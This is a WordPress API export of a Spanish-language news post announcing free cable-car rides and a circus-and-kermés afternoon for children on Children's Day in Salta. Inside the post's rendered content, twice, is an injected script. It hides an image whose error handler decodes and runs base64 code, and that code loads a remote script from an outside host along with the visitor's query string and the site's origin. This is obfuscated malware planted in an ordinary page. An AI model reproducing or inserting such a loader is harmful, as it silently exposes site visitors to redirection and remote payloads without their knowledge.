{"id":3003,"date":"2023-08-18T12:26:51","date_gmt":"2023-08-18T15:26:51","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3003"},"modified":"2025-08-14T00:10:14","modified_gmt":"2025-08-14T03:10:14","slug":"el-teleferico-san-bernardo-sera-gratuito-para-menores-en-el-dia-de-las-infancias","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3003","title":{"rendered":"El Telef\u00e9rico San Bernardo ser\u00e1 gratuito para menores en el D\u00eda de las Infancias"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a4042c\"><em>Los ni\u00f1os podr\u00e1n disfrutar de una tarde de circo y kerm\u00e9s en la cima del cerro, en una jornada colmada de juegos, sorpresas y mucha diversi\u00f3n.<\/em><\/h4>\n\n\n\n<p>Telef\u00e9rico San Bernardo invita a pasar una tarde muy especial para celebrar el D\u00eda de las Infancias con una propuesta de circo y kerm\u00e9s para disfrute de los m\u00e1s chicos. La cita ser\u00e1 el domingo 20, de 14 a 17.<\/p>\n\n\n\n<p>En la cima del cerro San Bernardo se montar\u00e1 una kerm\u00e9s con m\u00e1s de 15 puestos que ofrecer\u00e1n juegos recreativos y de ingenio, en los cuales los ni\u00f1os podr\u00e1n obtener tickets para canjear por premios. Durante la jornada tambi\u00e9n se realizar\u00e1n sorteos y finalizar\u00e1 con un show de circo para disfrutar en familia, como broche de oro de esta celebraci\u00f3n colmada de juegos, sorpresas y mucha diversi\u00f3n.<\/p>\n\n\n\n<p>Cabe destacar que la entrada para subir en g\u00f3ndola ser\u00e1 gratuita para los ni\u00f1os menores de 12 a\u00f1os, mientras que los adultos que los acompa\u00f1en pagar\u00e1n una tarifa especial de $1000. Desde el Telef\u00e9rico recuerdan que cada cuatro ni\u00f1os deber\u00e1 haber un adulto responsable.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-teleferico-san-bernardo-sera-gratuito-para-menores-en-el-dia-de-las-infancias-91315\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los ni\u00f1os podr\u00e1n disfrutar de una tarde de circo y kerm\u00e9s en la cima del cerro, en una jornada colmada de juegos, sorpresas y mucha diversi\u00f3n. Telef\u00e9rico San Bernardo invita a pasar una tarde muy especial para celebrar el D\u00eda de las Infancias con una propuesta de circo y kerm\u00e9s para disfrute de los m\u00e1s [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3004,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,17],"tags":[],"class_list":{"0":"post-3003","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3003"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3003"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3003\/revisions"}],"predecessor-version":[{"id":6989,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3003\/revisions\/6989"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3004"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3003"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3003"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3003"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}